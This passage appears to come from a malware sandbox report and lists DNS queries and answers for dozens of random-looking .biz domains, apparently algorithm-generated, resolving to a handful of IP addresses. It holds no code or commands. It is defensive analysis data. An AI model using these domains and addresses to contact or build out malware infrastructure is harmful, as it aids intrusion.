                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.818048000 CEST192.168.2.41.1.1.10xb603Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:05.897269964 CEST192.168.2.41.1.1.10xc08eStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:05.926830053 CEST192.168.2.41.1.1.10xc08eStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:56.397173882 CEST1.1.1.1192.168.2.40x5cb9No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:57.213407993 CEST1.1.1.1192.168.2.40x8fcdNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:58.126497984 CEST1.1.1.1192.168.2.40x17fbNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.136785984 CEST1.1.1.1192.168.2.40xf763No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.136868954 CEST1.1.1.1192.168.2.40xf763No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.216262102 CEST1.1.1.1192.168.2.40xbdNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.937522888 CEST1.1.1.1192.168.2.40x8d92No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:01.471822977 CEST1.1.1.1192.168.2.40xe065No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:01.471822977 CEST1.1.1.1192.168.2.40xe065No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:01.648447990 CEST1.1.1.1192.168.2.40x23f2No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:02.565486908 CEST1.1.1.1192.168.2.40x6191Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:02.574161053 CEST1.1.1.1192.168.2.40xd7ddNo error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:03.462570906 CEST1.1.1.1192.168.2.40xd617No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.044408083 CEST1.1.1.1192.168.2.40x1cd2Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.055921078 CEST1.1.1.1192.168.2.40xa98cName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.069319963 CEST1.1.1.1192.168.2.40xdd98No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.768430948 CEST1.1.1.1192.168.2.40x2baaNo error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.768430948 CEST1.1.1.1192.168.2.40x2baaNo error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.065259933 CEST1.1.1.1192.168.2.40xd1ceName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.075315952 CEST1.1.1.1192.168.2.40xcc52No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:08.311435938 CEST1.1.1.1192.168.2.40xbccName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:08.319875002 CEST1.1.1.1192.168.2.40xe3ecName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:08.329819918 CEST1.1.1.1192.168.2.40x3cecNo error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:14.496702909 CEST1.1.1.1192.168.2.40x33f4No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.448232889 CEST1.1.1.1192.168.2.40xd0f1No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:36.443048954 CEST1.1.1.1192.168.2.40x1b9No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.555598021 CEST1.1.1.1192.168.2.40xd160No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.616730928 CEST1.1.1.1192.168.2.40x4dc6No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.964734077 CEST1.1.1.1192.168.2.40xdb37No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.366291046 CEST1.1.1.1192.168.2.40x7a09No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.563415051 CEST1.1.1.1192.168.2.40x35e0No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.406192064 CEST1.1.1.1192.168.2.40x4270No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.406192064 CEST1.1.1.1192.168.2.40x4270No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.774672031 CEST1.1.1.1192.168.2.40xd5e3No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.585037947 CEST1.1.1.1192.168.2.40x1e9fNo error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.651650906 CEST1.1.1.1192.168.2.40x42c2No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.422286987 CEST1.1.1.1192.168.2.40x1257No error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.980623007 CEST1.1.1.1192.168.2.40x1d17No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.293546915 CEST1.1.1.1192.168.2.40x99aeNo error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.293546915 CEST1.1.1.1192.168.2.40x99aeNo error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.910003901 CEST1.1.1.1192.168.2.40xb223No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.229948044 CEST1.1.1.1192.168.2.40xa254No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.327291965 CEST1.1.1.1192.168.2.40x7e77No error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.075503111 CEST1.1.1.1192.168.2.40xa1c0No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.200038910 CEST1.1.1.1192.168.2.40x61e3No error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.925452948 CEST1.1.1.1192.168.2.40x78d3No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.133580923 CEST1.1.1.1192.168.2.40xc494No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.707488060 CEST1.1.1.1192.168.2.40xb6f0No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.168936014 CEST1.1.1.1192.168.2.40x6fe8No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.326406956 CEST1.1.1.1192.168.2.40x755bNo error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.326406956 CEST1.1.1.1192.168.2.40x755bNo error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.658698082 CEST1.1.1.1192.168.2.40xdc0fNo error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.990386009 CEST1.1.1.1192.168.2.40x4b3cNo error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.484894037 CEST1.1.1.1192.168.2.40x23c8No error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.123692036 CEST1.1.1.1192.168.2.40x140No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.385152102 CEST1.1.1.1192.168.2.40x72a9No error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.196222067 CEST1.1.1.1192.168.2.40xb467No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.225687027 CEST1.1.1.1192.168.2.40xaeebNo error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.048091888 CEST1.1.1.1192.168.2.40x54bfNo error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.181853056 CEST1.1.1.1192.168.2.40x323fNo error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.830239058 CEST1.1.1.1192.168.2.40x1ee7No error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.830239058 CEST1.1.1.1192.168.2.40x1ee7No error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.811986923 CEST1.1.1.1192.168.2.40x7bc3No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.151696920 CEST1.1.1.1192.168.2.40xb990No error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.355309010 CEST1.1.1.1192.168.2.40x92f0No error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.908399105 CEST1.1.1.1192.168.2.40x7154No error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.010552883 CEST1.1.1.1192.168.2.40x179aNo error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.882520914 CEST1.1.1.1192.168.2.40x3464No error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.371299982 CEST1.1.1.1192.168.2.40xce8No error (0)vyome.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.856000900 CEST1.1.1.1192.168.2.40x7146No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.973038912 CEST1.1.1.1192.168.2.40x3951No error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.808923006 CEST1.1.1.1192.168.2.40x4c3aNo error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:02.317178011 CEST1.1.1.1192.168.2.40xef01No error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.661354065 CEST1.1.1.1192.168.2.40x8810No error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.931345940 CEST1.1.1.1192.168.2.40x4126No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.908610106 CEST1.1.1.1192.168.2.40x5a11No error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.253679991 CEST1.1.1.1192.168.2.40x24bcNo error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.827857971 CEST1.1.1.1192.168.2.40x2a38No error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.153832912 CEST1.1.1.1192.168.2.40xd9dfNo error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.556078911 CEST1.1.1.1192.168.2.40xd718No error (0)vyome.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.631300926 CEST1.1.1.1192.168.2.40x298No error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:08.400057077 CEST1.1.1.1192.168.2.40x2fe4No error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.159790039 CEST1.1.1.1192.168.2.40x4b25No error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.270854950 CEST1.1.1.1192.168.2.40xb164No error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.147747040 CEST1.1.1.1192.168.2.40xb88fNo error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.798365116 CEST1.1.1.1192.168.2.40xcee4No error (0)qpnczch.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.869848967 CEST1.1.1.1192.168.2.40xc0ffNo error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.499866962 CEST1.1.1.1192.168.2.40x71b2No error (0)brsua.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:12.489759922 CEST1.1.1.1192.168.2.40x4ddNo error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:12.541712046 CEST1.1.1.1192.168.2.40x8740No error (0)dlynankz.biz85.214.228.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.295649052 CEST1.1.1.1192.168.2.40xb294No error (0)oflybfv.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.605644941 CEST1.1.1.1192.168.2.40x37e3No error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.906305075 CEST1.1.1.1192.168.2.40x82eeNo error (0)yhqqc.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.281294107 CEST1.1.1.1192.168.2.40x141dNo error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.767105103 CEST1.1.1.1192.168.2.40xa8ceNo error (0)mnjmhp.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.066489935 CEST1.1.1.1192.168.2.40xe340No error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.699423075 CEST1.1.1.1192.168.2.40xe2b7No error (0)opowhhece.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.186758995 CEST1.1.1.1192.168.2.40x1279No error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.246922016 CEST1.1.1.1192.168.2.40xfbe9No error (0)jdhhbs.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.921395063 CEST1.1.1.1192.168.2.40x447fNo error (0)qpnczch.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.711159945 CEST1.1.1.1192.168.2.40x49No error (0)mgmsclkyu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.775360107 CEST1.1.1.1192.168.2.40x8cb2No error (0)brsua.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.478424072 CEST1.1.1.1192.168.2.40x6e2fNo error (0)warkcdu.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.990777969 CEST1.1.1.1192.168.2.40xc663No error (0)dlynankz.biz85.214.228.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.839298010 CEST1.1.1.1192.168.2.40x8b30No error (0)gcedd.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.898057938 CEST1.1.1.1192.168.2.40x6a64No error (0)oflybfv.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.240900040 CEST1.1.1.1192.168.2.40xde3bNo error (0)jwkoeoqns.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.423928022 CEST1.1.1.1192.168.2.40xbec3No error (0)yhqqc.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.726070881 CEST1.1.1.1192.168.2.40x625aNo error (0)xccjj.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.248605013 CEST1.1.1.1192.168.2.40xb359No error (0)hehckyov.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.527308941 CEST1.1.1.1192.168.2.40x90efNo error (0)mnjmhp.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.932609081 CEST1.1.1.1192.168.2.40xf1f0No error (0)rynmcq.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.883683920 CEST1.1.1.1192.168.2.40x1ea1No error (0)uaafd.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.221669912 CEST1.1.1.1192.168.2.40xd616No error (0)opowhhece.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.154342890 CEST1.1.1.1192.168.2.40xd4e3No error (0)eufxebus.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.854667902 CEST1.1.1.1192.168.2.40xaefNo error (0)jdhhbs.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.520008087 CEST1.1.1.1192.168.2.40x1080No error (0)pwlqfu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.011852980 CEST1.1.1.1192.168.2.40x51faNo error (0)rrqafepng.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.057868958 CEST1.1.1.1192.168.2.40x3fNo error (0)mgmsclkyu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.310770035 CEST1.1.1.1192.168.2.40x5fcdNo error (0)warkcdu.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.380857944 CEST1.1.1.1192.168.2.40xf152No error (0)ctdtgwag.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.875766039 CEST1.1.1.1192.168.2.40x8f0eNo error (0)tnevuluw.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.646404982 CEST1.1.1.1192.168.2.40x6358No error (0)whjovd.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.957355976 CEST1.1.1.1192.168.2.40xe03aNo error (0)gcedd.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.026134014 CEST1.1.1.1192.168.2.40xc383No error (0)gjogvvpsf.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.845635891 CEST1.1.1.1192.168.2.40x14cfNo error (0)reczwga.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.967751026 CEST1.1.1.1192.168.2.40x67f8No error (0)jwkoeoqns.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.325953007 CEST1.1.1.1192.168.2.40x47e1No error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.650608063 CEST1.1.1.1192.168.2.40x2f7eNo error (0)xccjj.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.101468086 CEST1.1.1.1192.168.2.40x7e49No error (0)damcprvgv.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.358258009 CEST1.1.1.1192.168.2.40xbb70No error (0)hehckyov.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.598140955 CEST1.1.1.1192.168.2.40x65b1No error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.499947071 CEST1.1.1.1192.168.2.40xd2bbNo error (0)ywffr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.509099960 CEST1.1.1.1192.168.2.40xf671No error (0)rynmcq.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.268737078 CEST1.1.1.1192.168.2.40x3be8No error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.739177942 CEST1.1.1.1192.168.2.40x74d7No error (0)uaafd.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.029505968 CEST1.1.1.1192.168.2.40x7c88No error (0)pectx.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.527285099 CEST1.1.1.1192.168.2.40x106dNo error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.737786055 CEST1.1.1.1192.168.2.40xe62cNo error (0)eufxebus.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.061403036 CEST1.1.1.1192.168.2.40xd183No error (0)banwyw.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.611725092 CEST1.1.1.1192.168.2.40x8eecNo error (0)wxgzshna.biz72.52.178.23A (IP address)IN (0x0001)false
